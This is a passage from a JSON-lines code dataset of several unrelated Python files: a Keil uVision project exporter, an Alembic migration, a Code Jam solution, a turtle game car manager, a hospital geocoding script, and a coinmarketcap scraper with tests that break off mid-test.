self._uvproj_clean_xmldict(uvproj_dic['Simulator'])\n self._uvproj_clean_xmldict(uvproj_dic['Target'])\n self._uvproj_clean_xmldict(uvproj_dic['TargetDlls'])\n\n def _uvproj_set_DllOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_set_TargetArmAds(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic['Aads'])\n self._uvproj_clean_xmldict(uvproj_dic['Aads']['VariousControls'])\n self._uvproj_clean_xmldict(uvproj_dic['ArmAdsMisc'])\n self._uvproj_clean_xmldict(uvproj_dic['Cads'])\n self._uvproj_clean_xmldict(uvproj_dic['Cads']['VariousControls'])\n self._uvproj_clean_xmldict(uvproj_dic['LDads'])\n uvproj_dic['LDads']['ScatterFile'] = project_dic['linker_file']\n\n uvproj_dic['Cads']['VariousControls']['IncludePath'] = '; '.join(project_dic['include_paths'])\n uvproj_dic['Cads']['VariousControls']['Define'] = ', '.join(project_dic['macros'])\n if project_dic['macros']:\n if self.use_armclang():\n uvproj_dic['Aads']['VariousControls']['MiscControls'] = '-D' + ' -D'.join(project_dic['macros'])\n else:\n uvproj_dic['Aads']['VariousControls']['MiscControls'] = '--cpreproc --cpreproc_opts=-D' + ',-D'.join(project_dic['macros'])\n\n for misc_keys in project_dic['misc'].keys():\n # ld-flags dont follow the same as asm/c flags, why?!? 
Please KEIL fix this\n if misc_keys == 'ld_flags':\n for item in project_dic['misc'][misc_keys]:\n uvproj_dic[self.FLAGS_TO_UVISION[misc_keys]]['Misc'] += ' ' + item\n else:\n for item in project_dic['misc'][misc_keys]:\n uvproj_dic[self.FLAGS_TO_UVISION[misc_keys]]['VariousControls']['MiscControls'] += ' ' + item\n\n def _uvproj_set_TargetCommonOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n self._uvproj_clean_xmldict(uvproj_dic['AfterMake'])\n self._uvproj_clean_xmldict(uvproj_dic['BeforeCompile'])\n self._uvproj_clean_xmldict(uvproj_dic['BeforeMake'])\n self._uvproj_clean_xmldict(uvproj_dic['TargetStatus'])\n uvproj_dic['OutputDirectory'] = project_dic['build_dir']\n uvproj_dic['OutputName'] = project_dic['name']\n uvproj_dic['CreateExecutable'] = 1 if project_dic['output_type'] == 'exe' else 0\n uvproj_dic['CreateLib'] = 1 if project_dic['output_type'] == 'lib' else 0\n\n def _uvproj_set_Utilities(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_files_set(self, uvproj_dic, project_dic):\n uvproj_dic['Project']['Targets']['Target']['Groups'] = OrderedDict()\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'] = []\n i = 0\n for group_name, files in project_dic['groups'].items():\n # Why OrderedDict() - uvision project requires an order. GroupName must be before Files,\n # otherwise it does not sense any file. Same applies for other attributes, like VariousControl.\n # Therefore be aware that order matters in this exporter\n group = OrderedDict()\n group['GroupName'] = group_name\n # group['Files'] = {}\n group['Files'] = {'File': []}\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'].append(group)\n for file in files:\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File'].append(file)\n files = uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File']\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File'] = sorted(files, key=lambda x: x['FileName'].lower())\n i += 1\n\n def _generate_uvmpw_file(self):\n uvmpw_dic = xmltodict.parse(open(self.uvmpw_file, \"rb\"))\n uvmpw_dic['ProjectWorkspace']['project'] = []\n\n for project in self.workspace['projects']:\n # We check how far is project from root and workspace. IF they dont match,\n # get relpath for project and inject it into workspace\n path_project = os.path.dirname(project['files']['uvproj'])\n path_workspace = os.path.dirname(self.workspace['settings']['path'] + '\\\\')\n destination = os.path.join(os.path.relpath(self.env_settings.root, path_project), project['files']['uvproj'])\n if path_project != path_workspace:\n destination = os.path.join(os.path.relpath(self.env_settings.root, path_workspace), project['files']['uvproj'])\n uvmpw_dic['ProjectWorkspace']['project'].append({'PathAndName': destination})\n\n # generate the file\n uvmpw_xml = xmltodict.unparse(uvmpw_dic, pretty=True)\n project_path, uvmpw = self.gen_file_raw(uvmpw_xml, '%s.uvmpw' % self.workspace['settings']['name'], self.workspace['settings']['path'])\n return project_path, uvmpw\n\n def _set_target(self, expanded_dic, uvproj_dic, tool_name):\n pro_def = ProGenDef(tool_name)\n if not pro_def.is_supported(expanded_dic['target'].lower()):\n raise RuntimeError(\"Target %s is not supported. 
Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n mcu_def_dic = pro_def.get_tool_definition(expanded_dic['target'].lower())\n if not mcu_def_dic:\n raise RuntimeError(\n \"Target definitions were not found for %s. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n logger.debug(\"Mcu definitions: %s\" % mcu_def_dic)\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Device'] = mcu_def_dic['TargetOption']['Device'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['DeviceId'] = mcu_def_dic['TargetOption']['DeviceId'][0]\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Vendor'] = mcu_def_dic['TargetOption']['Vendor'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Cpu'] = mcu_def_dic['TargetOption']['Cpu'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['FlashDriverDll'] = str(mcu_def_dic['TargetOption']['FlashDriverDll'][0])\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['SFDFile'] = mcu_def_dic['TargetOption']['SFDFile'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['RegisterFile'] = mcu_def_dic['TargetOption']['RegisterFile'][0]\n except KeyError:\n pass\n\n uvproj_dic['Project']['Targets']['Target']['uAC6'] = \"1\" if self.use_armclang() else \"0\"\n\n # overwrite the template if target has defined debugger\n # later progen can overwrite this if debugger is set in project data\n try:\n debugger_name = pro_def.get_debugger(expanded_dic['target'])['name']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption']['TargetDlls']['Driver'] = self.definitions.debuggers[debugger_name]['uvproj']['TargetDlls']['Driver']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities']['Flash2'] = self.definitions.debuggers[debugger_name]['uvproj']['Utilities']['Flash2']\n except (TypeError, KeyError) as err:\n pass\n # Support new device packs\n if 'PackID' in mcu_def_dic['TargetOption']:\n if 'uvision5' in tool_name:\n # using software packs require v5\n logger.info(\"The target might not be supported in %s, requires uvision5\" % tool_name)\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['PackID'] = mcu_def_dic['TargetOption']['PackID'][0]\n\n def _uvoptx_set_debugger(self, expanded_dic, uvoptx_dic, tool_name):\n pro_def = ProGenDef(tool_name)\n if not pro_def.is_supported(expanded_dic['target'].lower()):\n raise RuntimeError(\"Target %s is not supported. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n mcu_def_dic = pro_def.get_tool_definition(expanded_dic['target'].lower())\n if not mcu_def_dic:\n raise RuntimeError(\n \"Target definitions were not found for %s. 
Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n logger.debug(\"Mcu definitions: %s\" % mcu_def_dic)\n\n # set the same target name FlashDriverDll config as in uvprojx file\n try:\n uvoptx_dic['ProjectOpt']['Target']['TargetName'] = expanded_dic['name']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['TargetDriverDllRegistry']['SetRegEntry']['Name'] = str(mcu_def_dic['TargetOption']['FlashDriverDll'][0])\n except KeyError:\n return\n\n # load debugger from target dictionary or use default debugger\n try:\n debugger_dic = pro_def.get_debugger(expanded_dic['target'])\n if debugger_dic is None:\n debugger_name = self.definitions.debuggers_default\n else:\n debugger_name = debugger_dic['name']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['DebugOpt']['nTsel'] = self.definitions.debuggers[debugger_name]['uvoptx']['DebugOpt']['nTsel']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['DebugOpt']['pMon'] = self.definitions.debuggers[debugger_name]['uvoptx']['DebugOpt']['pMon']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['TargetDriverDllRegistry']['SetRegEntry']['Key'] = self.definitions.debuggers[debugger_name]['uvoptx']['SetRegEntry']['Key']\n except KeyError:\n raise RuntimeError(\"Debugger %s is not supported\" % expanded_dic['debugger'])\n\n def _export_single_project(self, tool_name):\n expanded_dic = self.workspace.copy()\n\n groups = self._get_groups(self.workspace)\n expanded_dic['groups'] = {}\n for group in groups:\n expanded_dic['groups'][group] = []\n\n # get relative path and fix all paths within a project\n self._iterate(self.workspace, expanded_dic)\n\n expanded_dic['build_dir'] = '.\\\\' + expanded_dic['build_dir'] + '\\\\'\n\n # generic tool template specified or project\n if expanded_dic['template']:\n for template in expanded_dic['template']:\n template = join(getcwd(), template)\n if os.path.splitext(template)[1] == '.uvproj' or os.path.splitext(template)[1] == '.uvprojx' or \\\n re.match('.*\\.uvproj.tmpl$', template) or re.match('.*\\.uvprojx.tmpl$', template):\n try:\n uvproj_dic = xmltodict.parse(open(template, encoding=\"utf8\").read())\n except IOError:\n logger.info(\"Template file %s not found\" % template)\n return None, None\n else:\n logger.info(\"Template file %s contains unknown template extension (.uvproj/x are valid). Using default one\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n elif 'uvision' in self.env_settings.templates.keys():\n # template overrides what is set in the yaml files\n for template in self.env_settings.templates['uvision']:\n template = join(getcwd(), template)\n if os.path.splitext(template)[1] == '.uvproj' or os.path.splitext(template)[1] == '.uvprojx' or \\\n re.match('.*\\.uvproj.tmpl$', template) or re.match('.*\\.uvprojx.tmpl$', template):\n try:\n uvproj_dic = xmltodict.parse(open(template, encoding=\"utf8\").read())\n except IOError:\n logger.info(\"Template file %s not found. Using default template\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n else:\n logger.info(\"Template file %s contains unknown template extension (.uvproj/x are valid). 
Using default one\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file))\n else:\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetName'] = expanded_dic['name']\n except KeyError:\n raise RuntimeError(\"The uvision template is not valid .uvproj file\")\n\n self._uvproj_files_set(uvproj_dic, expanded_dic)\n self._uvproj_set_CommonProperty(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['CommonProperty'], expanded_dic)\n self._uvproj_set_DebugOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption'], expanded_dic)\n self._uvproj_set_DllOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DllOption'], expanded_dic)\n self._uvproj_set_TargetArmAds(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetArmAds'], expanded_dic)\n self._uvproj_set_TargetCommonOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption'], expanded_dic)\n self._uvproj_set_Utilities(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities'], expanded_dic)\n\n # set target only if defined, otherwise use from template/default one\n if 'uvision5' in tool_name:\n extension = 'uvprojx'\n uvproj_dic['Project']['SchemaVersion'] = '2.1'\n else:\n extension = 'uvproj'\n uvproj_dic['Project']['SchemaVersion'] = '1.1'\n\n if expanded_dic['target']:\n self._set_target(expanded_dic, uvproj_dic, tool_name)\n\n # load debugger\n if expanded_dic['debugger']:\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption']['TargetDlls']['Driver'] = self.definitions.debuggers[expanded_dic['debugger']]['uvproj']['TargetDlls']['Driver']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities']['Flash2'] = self.definitions.debuggers[expanded_dic['debugger']]['uvproj']['Utilities']['Flash2']\n except KeyError:\n raise RuntimeError(\"Debugger %s is not supported\" % expanded_dic['debugger'])\n\n # Project file\n uvproj_xml = xmltodict.unparse(uvproj_dic, pretty=True)\n project_path, uvproj = self.gen_file_raw(uvproj_xml, '%s.%s' % (expanded_dic['name'], extension), expanded_dic['output_dir']['path'])\n\n uvoptx = None\n\n # generic tool template specified\n uvoptx_dic = xmltodict.parse(open(self.uvoptx_file, \"rb\"))\n\n self._uvoptx_set_debugger(expanded_dic, uvoptx_dic, tool_name)\n\n # set target only if defined, otherwise use from template/default one\n if 'uvision5' in tool_name:\n extension = 'uvoptx'\n else:\n extension = 'uvopt'\n\n # Project file\n uvoptx_xml = xmltodict.unparse(uvoptx_dic, pretty=True)\n project_path, uvoptx = self.gen_file_raw(uvoptx_xml, '%s.%s' % (expanded_dic['name'], extension), expanded_dic['output_dir']['path'])\n\n return project_path, [uvproj, uvoptx]\n\n def export_workspace(self):\n path, workspace = self._generate_uvmpw_file()\n return path, [workspace]\n\n def export_project(self):\n path, files = self._export_single_project('uvision') #todo: uvision will switch to uv4\n generated_projects = copy.deepcopy(self.generated_project)\n generated_projects['path'] = path\n generated_projects['files']['uvproj'] = files[0]\n return generated_projects\n\n def get_generated_project_files(self):\n return {'path': self.workspace['path'], 'files': [self.workspace['files']['uvproj']]}\n\n def _build_project(self, tool_name, extension):\n # > UV4 -b [project_path]\n path = join(self.env_settings.root, self.workspace['files'][extension])\n if path.split('.')[-1] != extension:\n path 
= path + extension\n\n if not os.path.exists(path):\n logger.debug(\"The file: %s does not exists, exported prior building?\" % path)\n return -1\n\n logger.debug(\"Building uVision project: %s\" % path)\n\n build_log_path = join(os.path.dirname(path),'build','build_log.txt')\n args = [self.env_settings.get_env_settings(tool_name), '-r', '-j0', '-o', build_log_path, path]\n logger.debug(args)\n\n try:\n ret_code = None\n ret_code = subprocess.call(args)\n except:\n logger.error(\n \"Error whilst calling UV4: '%s'. Please set uvision path in the projects.yaml file.\" % self.env_settings.get_env_settings('uvision'))\n return -1\n else:\n if ret_code != self.SUCCESSVALUE and ret_code != self.WARNVALUE:\n # Seems like something went wrong.\n logger.error(\"Project: %s build failed with the status: %s\" % (self.workspace['files'][extension], self.ERRORLEVEL.get(ret_code, \"Unknown\")))\n return -1\n else:\n logger.info(\"Project: %s build succeeded with the status: %s\" % (self.workspace['files'][extension], self.ERRORLEVEL.get(ret_code, \"Unknown\")))\n return 0\n\n def build_project(self, **kwargs):\n return self._build_project('uvision', 'uvproj')\n\nclass Uvision5(Uvision):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def __init__(self, workspace, env_settings):\n super(Uvision5, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision5']\n\n def export_project(self):\n path, files = self._export_single_project('uvision5')\n generated_projects = copy.deepcopy(self.generated_project)\n generated_projects['path'] = path\n generated_projects['files']['uvprojx'] = files[0]\n generated_projects['files']['uvoptx'] = files[1]\n return generated_projects\n\n def get_generated_project_files(self):\n return {'path': self.workspace['path'], 'files': [self.workspace['files']['uvprojx'], self.workspace['files']['uvoptx']]}\n\n def build_project(self, **kwargs):\n # tool_name uvision as uv4 is still used in uv5\n return self._build_project('uvision', 'uvprojx')\n\n\nclass UvisionArmC6(Uvision):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def use_armclang(self):\n return True\n\n def __init__(self, workspace, env_settings):\n super(UvisionArmC6, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision_armc6']\n\n @staticmethod\n def get_toolchain():\n return 'uvision_armc6'\n\nclass Uvision5ArmC6(Uvision5):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def use_armclang(self):\n return True\n\n def __init__(self, workspace, env_settings):\n super(Uvision5ArmC6, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision5_armc6']\n\n @staticmethod\n def get_toolchain():\n return 'uvision_armc6'\n","repo_name":"project-generator/project_generator","sub_path":"project_generator/tools/uvision.py","file_name":"uvision.py","file_ext":"py","file_size_in_byte":26147,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"61"} +{"seq_id":"24021513286","text":"\"\"\"empty message\n\nRevision ID: 0c1e847a182e\nRevises: e800d9440b54\nCreate Date: 2023-05-25 17:17:05.962086\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '0c1e847a182e'\ndown_revision = 'e800d9440b54'\nbranch_labels = 
None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('payment', schema=None) as batch_op:\n batch_op.add_column(sa.Column('option', sa.String(length=200), nullable=True))\n\n with op.batch_alter_table('subscription', schema=None) as batch_op:\n batch_op.drop_column('option')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('subscription', schema=None) as batch_op:\n batch_op.add_column(sa.Column('option', mysql.VARCHAR(charset='utf8mb4', collation='utf8mb4_general_ci', length=200), nullable=True))\n\n with op.batch_alter_table('payment', schema=None) as batch_op:\n batch_op.drop_column('option')\n\n # ### end Alembic commands ###\n","repo_name":"Shaykhattarov/crm-domofon-flask","sub_path":"migrations/versions/0c1e847a182e_.py","file_name":"0c1e847a182e_.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23401363441","text":"import sys\r\nimport os\r\nimport math\r\nimport Tkinter\r\n\r\ndef main():\r\n from tkFileDialog import askopenfilename\r\n root=Tkinter.Tk()\r\n root.withdraw()\r\n nameIn = askopenfilename(title=\"Bullseye\",filetypes=[(\"text\",\"*.txt\"),(\"all files\",\"*\")])\r\n file = open(nameIn,\"r\")\r\n T=file.readline()\r\n ofile = open(\"output.txt\",\"w\")\r\n \r\n for i in range(0,int(T)):\r\n row=file.readline().rsplit()\r\n r=int(row[0])\r\n t=int(row[1])\r\n number = paint(r,t)\r\n ofile.write(\"Case #\"+str(i+1)+': '+number+'\\n')\r\n\r\ndef paint(r,t):\r\n rp=t\r\n count=0\r\n while (2*r+1)<=rp:\r\n count+=1\r\n rp-=2*r+1\r\n r+=2\r\n return str(count)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_120/716.py","file_name":"716.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5797930747","text":"import random\nfrom turtle import Turtle, Screen\nscreen = Screen()\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.STARTING_MOVE_DISTANCE = 5\n self.MOVE_INCREMENT = 5\n\n def create_car(self):\n random_chance = random.randint(0, 6)\n if random_chance == 1:\n screen.tracer(0)\n new_car = Turtle()\n color = random.choice(COLORS)\n new_car.shape(\"square\")\n new_car.color(color)\n new_car.penup()\n new_car.turtlesize(stretch_wid=1.1, stretch_len=3)\n new_car.setheading(180)\n new_y = random.randrange(-300, 300)\n new_car.goto(320, new_y)\n screen.update()\n self.cars.append(new_car)\n\n def move_car(self):\n for car in self.cars:\n car.forward(self.STARTING_MOVE_DISTANCE)\n\n def update_car_speed(self):\n self.STARTING_MOVE_DISTANCE += self.MOVE_INCREMENT\n","repo_name":"AjaySharma2003/100-Days-of-Code-The-Complete-Python-Pro-Bootcamp","sub_path":"Day_23_Turtle_Trafic/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29926429191","text":"from geopy.geocoders import GoogleV3\nimport geopy\nimport csv\nimport time\n\nAPI_KEY = \"\"\n\nINPUT_FILE = \"hospital_info.csv\"\nOUTPUT_FILE = \"coordinates.csv\"\n\nhospital_name_column = \"providerName\"\n\ndef main():\n with open(INPUT_FILE, \"r\") as incsv, 
open(OUTPUT_FILE, \"w\") as outcsv:\n reader = csv.reader(incsv)\n writer = csv.writer(outcsv)\n\n writer.writerow([\"providerName\",\"latitude\",\"longitude\"])\n\n skip_header = True\n missing_coords = []\n\n\n for row in reader:\n #Skip header\n if skip_header:\n skip_header = False\n continue\n\n #Get hospital data\n hospital_name = row[1]\n hospital_street = row[2]\n hospital_city = row[3]\n hospital_postcode = row[5]\n print(hospital_name)\n try:\n #print(\"Attempting {}\".format(hospital_name))\n location = GoogleV3(api_key=API_KEY, timeout=10).geocode(\"{} {} {}\".format(hospital_name,hospital_street,hospital_postcode))\n writer.writerow([hospital_name,location.latitude,location.longitude])\n print(\"OK\\n\")\n except AttributeError:\n print(\"MISSING\\n\")\n missing_coords.append(hospital_name)\n #time.sleep(1)\n outcsv.close()\n print(\"Missing coords for:\")\n for hosp in missing_coords:\n print(\"\\t {}\".format(hosp))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dtatkinson/indus","sub_path":"BigVinnysBigScripts/geocoding.py","file_name":"geocoding.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41108724162","text":"\"\"\" Module for requesting data from coinmarketcap.org and parsing it. \"\"\"\nimport codecs\nfrom datetime import datetime\nfrom datetime import time\nfrom decimal import Decimal\nimport json\nimport logging\nimport lxml.html\nimport requests\nimport os\nfrom random import random\nimport sys\nimport time\nimport unittest\n\nbaseUrl = \"http://coinmarketcap.com\"\ncountRequested = 0\ninterReqTime = 1\nlastReqTime = None\n\n\ndef _request(payloadString):\n \"\"\"Private method for requesting an arbitrary query string.\"\"\"\n global countRequested\n global lastReqTime\n if lastReqTime is not None and time.time() - lastReqTime < interReqTime:\n timeToSleep = random()*(interReqTime-time.time()+lastReqTime)*2\n logging.info(\"Sleeping for {0} seconds before request.\".format(\n timeToSleep))\n time.sleep(timeToSleep)\n logging.info(\"Issuing request for the following payload: {0}\".format(\n payloadString))\n r = requests.get(\"{0}/{1}\".format(baseUrl, payloadString))\n lastReqTime = time.time()\n countRequested += 1\n if r.status_code == requests.codes.ok:\n return r.text\n else:\n raise Exception(\"Could not process request. 
\\\n Received status code {0}.\".format(r.status_code))\n\n\ndef requestCurrencyList(view):\n \"\"\"Request a currency list.\"\"\"\n \"\"\"CAVEAT: Parse is currently built for only the 'all' view.\"\"\"\n return _request(\"currencies/views/{0}/\".format(view))\n\n\ndef requestCurrency(currencySlug):\n \"\"\"Request the page for a specific currency.\"\"\"\n \"\"\"CAVEAT: There is currently no corresponding parser for this data.\"\"\"\n return _request(\"currencies/{0}/\".format(currencySlug))\n\n\ndef requestMarketCap(currencySlug, numDays):\n \"\"\"Request market cap data for a given currency slug.\"\"\"\n return _request(\n \"static/generated_pages/currencies/datapoints/{0}-{1}d.json\".format(\n currencySlug, numDays))\n\n\ndef parseCurrencyListAll(html):\n \"\"\"Parse the information returned by requestCurrencyList for view 'all'.\"\"\"\n data = []\n\n docRoot = lxml.html.fromstring(html)\n currencyRows = docRoot.cssselect(\n \"table#currencies-all > tbody > tr\")\n\n for currencyRow in currencyRows:\n datum = {}\n currencyFields = currencyRow.cssselect(\"td\")\n\n # Name and slug\n nameField = currencyFields[1].cssselect(\"a\")[0]\n datum['name'] = nameField.text_content().strip()\n datum['slug'] = nameField.attrib['href'].replace(\n '/currencies/', '').replace('/', '').strip()\n\n # Symbol\n datum['symbol'] = currencyFields[2].text_content().strip()\n\n # Explorer link\n supplyFieldPossible = currencyFields[5].cssselect(\"a\")\n if len(supplyFieldPossible) > 0:\n datum['explorer_link'] = supplyFieldPossible[0].attrib['href']\n else:\n datum['explorer_link'] = ''\n\n data.append(datum)\n\n return data\n\n\ndef parseMarketCap(jsonDump, currency, includeVolume=False):\n \"\"\"Parse the supply and price information returned by requestMarketCap.\"\"\"\n data = []\n rawData = json.loads(jsonDump)\n\n # Covert data in document to wide format\n dataIntermediate = {}\n targetFields = [str(key.replace('_data', '')) for key in rawData.keys()]\n targetFields.remove('x_min')\n targetFields.remove('x_max')\n targetFields.remove('volume')\n for field, fieldData in rawData.iteritems():\n if field == 'x_min' or field == 'x_max' or field == 'volume_data':\n continue\n targetField = str(field.replace('_data', ''))\n for row in fieldData:\n time = int(row[0]/1000)\n if time not in dataIntermediate:\n dataIntermediate[time] = dict(zip(\n targetFields, [None]*len(targetFields)))\n dataIntermediate[time][targetField] = row[1]\n\n # Generate derived data & alter format\n times = sorted(dataIntermediate.keys())\n for time in times:\n datum = dataIntermediate[time]\n datum['currency'] = currency\n datum['time'] = datetime.utcfromtimestamp(time)\n\n if (datum['market_cap_by_available_supply'] is not None and\n datum['price_usd'] is not None):\n datum['est_available_supply'] = float(\n datum['market_cap_by_available_supply'] / datum['price_usd'])\n else:\n datum['est_available_supply'] = None\n\n if (datum['market_cap_by_total_supply'] is not None and\n datum['price_usd'] is not None):\n datum['est_total_supply'] = float(\n datum['market_cap_by_total_supply'] / datum['price_usd'])\n else:\n datum['est_available_supply'] = None\n\n data.append(datum)\n\n # Section for handling volume data if specified (has different time scale!)\n if not includeVolume:\n return data\n else:\n volData = []\n volDataRaw = sorted(\n rawData['volume_data'], key=lambda x: x[0])\n for vdr in volDataRaw:\n datum = {}\n datum['currency'] = currency\n datum['time'] = datetime.utcfromtimestamp(int(vdr[0]/1000))\n datum['volume'] = vdr[1]\n 
volData.append(datum)\n return data, volData\n\n\nclass CoinmarketcapTest(unittest.TestCase):\n\n \"\"\"\"Testing suite for coinmarketcap module.\"\"\"\n\n def testRequestCurrencyList(self):\n \"\"\"Test requestCurrencyList.\"\"\"\n html = requestCurrencyList(\"all\")\n f = codecs.open(\"{0}/data/test_currencylist.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')\n f.write(html)\n f.close()\n docRoot = lxml.html.fromstring(html)\n currencyRows = docRoot.cssselect(\n \"table#currencies-all > tbody > tr\")\n self.assertEqual(len(currencyRows) > 101, True)\n\n def testRequestCurrency(self):\n \"\"\"Test requestCurrency.\"\"\"\n html = requestCurrency(\"navajo\")\n f = codecs.open(\"{0}/data/test_currency_navajo.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')\n f.write(html)\n f.close()\n docRoot = lxml.html.fromstring(html)\n currency = docRoot.cssselect(\n \"div.container > div > div > h1.text-large\"\n )[0].text_content().strip()\n self.assertEqual(currency, \"Navajo (NAV)\")\n\n def testRequestMarketCap(self):\n \"\"\"Test requestMarketCap.\"\"\"\n jsonDump = requestMarketCap(\"navajo\", 7)\n f = open(\"{0}/data/test_marketcap_navajo_7d.json\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w')\n f.write(jsonDump)\n f.close()\n data = json.loads(jsonDump)\n headingsExpected = set([\n \"market_cap_by_available_supply_data\",\n \"market_cap_by_total_supply_data\",\n \"price_btc_data\",\n \"price_usd_data\",\n \"volume_data\",\n \"x_max\",\n \"x_min\"\n ])\n self.assertEqual(set(data.keys()), headingsExpected)\n\n def testParseCurrencyListAll(self):\n \"\"\"Test parseCurrencyListAll.\"\"\"\n f = codecs.open(\"{0}/example/currencylist.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')\n html = f.read()\n f.close()\n data = parseCurrencyListAll(html)\n self.assertEqual(len(data), 452)\n expectedFirst = {\n 'name': 'Bitcoin',\n 'slug': 'bitcoin',\n 'symbol': 'BTC',\n 'explorer_link': 'http://blockchain.info'\n }\n self.assertEqual(data[0], expectedFirst)\n expectedLast = {\n 'name': 'Marscoin',\n 'slug': 'marscoin',\n 'symbol': 'MRS',\n 'explorer_link': 'http://explore.marscoin.org/chain/Marscoin/'\n }\n self.assertEqual(data[-1], expectedLast)\n\n def testParseMarketCap(self):\n \"\"\"Test parseMarketCap.\"\"\"\n f = open(\"{0}/example/marketcap_navajo_7d.json\".format(\n os.path.dirname(os.path.abspath(__file__))), 'r')\n jsonDump = f.read()\n f.close()\n\n data = parseMarketCap(jsonDump, 'navajo')\n self.assertEqual(len(data), 287)\n self.maxDiff = None\n expectedFirst = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1406855058),\n 'market_cap_by_available_supply': 196545.14489832715,\n 'market_cap_by_total_supply': 196545.14489832715,\n 'price_usd': 0.00344855,\n 'price_btc': .00000588286,\n 'est_available_supply': 56993561.0324128,\n 'est_total_supply': 56993561.0324128\n }\n self.assertEqual(data[0], expectedFirst)\n expectedLast = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1407458053),\n 'market_cap_by_available_supply': 124991.3258020573,\n 'market_cap_by_total_supply': 124991.3258020573,\n 'price_usd': 0.00219195,\n 'price_btc': .00000372172,\n 'est_available_supply': 57022890.942794,\n 'est_total_supply': 57022890.942794\n }\n self.assertEqual(data[-1], expectedLast)\n\n data, volData = parseMarketCap(\n jsonDump, 'navajo', includeVolume=True)\n self.assertEqual(len(volData), 7)\n expectedVolFirst = {\n 'currency': 'navajo',\n 'time': 
